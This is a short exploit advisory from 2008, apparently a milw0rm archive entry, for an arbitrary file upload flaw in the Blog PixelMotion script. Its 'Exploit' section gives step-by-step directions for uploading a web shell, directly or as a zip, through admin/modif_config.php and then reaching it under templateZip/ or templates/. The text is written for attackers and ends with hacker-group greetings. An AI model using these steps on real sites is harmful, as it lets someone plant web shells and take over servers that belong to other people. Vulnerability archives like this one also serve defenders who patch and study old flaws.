Blog PixelMotion - 'modif_config.php' Arbitrary File Upload



EKU-ID: 13323 CVE: OSVDB-ID:
Author: JIKO Published: 2008-04-06 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


-------------------------------------------------------------------------
  --          JIKI Team [ JIKO + KIl1er ]        ---
-------------------------------------------------------------------------
# Author  : jiko [jiki team]
# email  : jalikom@hotmail.com
# Home   : www.no-back.org
# Script  : Blog PixelMotion
# Bug   : Remote File Upload Vulnerability
# Download  : http://www.pixelmotion.org/zip/blog.zip

=========================JIkI Team===================
# Exploit  :
uploa your shell
  http://[Site]/[script]/admin/modif_config.php
http://[Site]/[script]/templateZip/[shell]
###################OR################
upload your shell compressed by Zip forme
  http://[Site]/[script]/admin/modif_config.php
after upload your shell go to
  http://[Site]/[script]/templates/[shell]
because your sheel has extract at templates
and has upload at templateZip
=========================JIKI Team===================
 greetz : all my friend and H-T Team
-------------------------------------------------------------------------
  --            JIKI Team [ JIKO + KIl1er ]    --
-------------------------------------------------------------------------

# milw0rm.com [2008-04-06]